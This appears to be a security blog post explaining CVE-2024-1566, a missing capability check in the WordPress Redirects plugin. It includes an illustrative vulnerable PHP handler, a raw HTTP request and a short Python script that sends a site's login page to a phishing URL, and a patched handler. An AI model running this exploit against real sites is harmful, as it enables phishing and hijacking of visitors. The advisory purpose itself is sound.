CVE-2024-1566 - Exploiting the WordPress Redirects Plugin Vulnerability for Unauthenticated Redirect Manipulation

WordPress powers millions of websites, but its rich plugin ecosystem sometimes introduces dangerous loopholes that attackers can exploit. In this article, we'll break down one such flaw—CVE-2024-1566—found in the popular Redirects plugin (up to version 1.2.1). This vulnerability allows attackers to change redirect rules without any authentication, which can direct visitors to phishing or malicious websites.

We'll go step by step: what this vulnerability is, how it works, code snippets showing the issue, a simple exploit, and references for further reading. If you're running this plugin, you should update or disable it immediately.

What is CVE-2024-1566?

CVE-2024-1566 affects all versions of the Redirects plugin for WordPress up to and including 1.2.1. The root cause? The plugin's "save" function lacks a proper capability check. Normally, only logged-in administrators should be able to add/edit redirects—but this plugin did not verify the user's privileges before saving changes.

Impact:
Anyone, including unauthenticated attackers (not even logged in!), can send a crafted HTTP request to change or create redirects. They could use this to covertly redirect your legitimate traffic to spam, phishing, or malware sites.

How the Vulnerability Works

WordPress plugins often provide a handler (think: a PHP function) to process data — for example, when an admin sets up a redirect from /old-page to /new-page. The handler should check if the user is authorized to make such changes, typically using current_user_can() or a nonce.

Let’s look at a simplified example of what the vulnerable code might look like

// Vulnerable "save" function, missing capability check
function redirects_save_handler() {
    // No user authentication or capability check here!
    $from = $_POST['from'];
    $to = $_POST['to'];

    // Save the redirect (to database, file, etc.)
    save_redirect($from, $to);

    echo 'Redirect saved!';
}
add_action('wp_ajax_redirects_save', 'redirects_save_handler');
add_action('wp_ajax_nopriv_redirects_save', 'redirects_save_handler'); // <-- mistake!

The key problem:
wp_ajax_nopriv_redirects_save allows anyone (even not logged in) to invoke this handler.

Step 1: Craft a Request

Attackers use a tool like cURL or Burp Suite to send a POST request to /wp-admin/admin-ajax.php?action=redirects_save, with the new redirect they want to set, for example:

POST /wp-admin/admin-ajax.php?action=redirects_save HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded

from=/important-page&to=https://evil-phishing.com/

There is no authentication required. The plugin accepts the input and updates the site's redirects.

Step 2: Users are Redirected

Now, whenever someone visits /important-page, they're secretly sent off to https://evil-phishing.com/.

Here’s a simple Python script to exploit this vulnerability

import requests

target = "https://victim-site.com";
redirect_from = "/wp-login.php"     # Path users will visit
redirect_to = "https://attacker.site/phishing-login";

payload = {
    "action": "redirects_save",  # AJAX action
    "from": redirect_from,
    "to": redirect_to
}

# No authentication needed!
resp = requests.post(target + "/wp-admin/admin-ajax.php", data=payload)
print(resp.text)

Result:
Anyone can programmatically set or change redirects on the site.

SEO Attack: Legitimate pages sent to junk, tanking your Google ranking.

Mitigation: Update the plugin, remove it, or disable vulnerable endpoints immediately.

A secure version must check capabilities (e.g., only admins can manage redirects)

function redirects_save_handler() {
    if ( ! current_user_can('manage_options') ) {
        wp_die('Unauthorized', 403); // Block unauthorized users
    }
    // ... proceed to save
}

And should remove the wp_ajax_nopriv_... hook, so unauthenticated requests are blocked.

References & Further Reading

- Wordfence Advisory
- CVE Details for CVE-2024-1566
- OWASP - Insecure Direct Object Reference
- WordPress Plugin Security Best Practices

Conclusion

CVE-2024-1566 in the WordPress Redirects plugin is a critical risk—anyone can modify your redirects and hijack visitors. Patch it as soon as possible. Always make sure plugins do not expose admin-level features to the world.

If you need to bulk check your site for vulnerabilities, consider reputable security scanning tools and subscribe to alerts from sources like Wordfence or the WPScan vulnerability database.

Timeline

Published on: 02/28/2024 09:15:43 UTC
Last modified on: 02/28/2024 14:06:45 UTC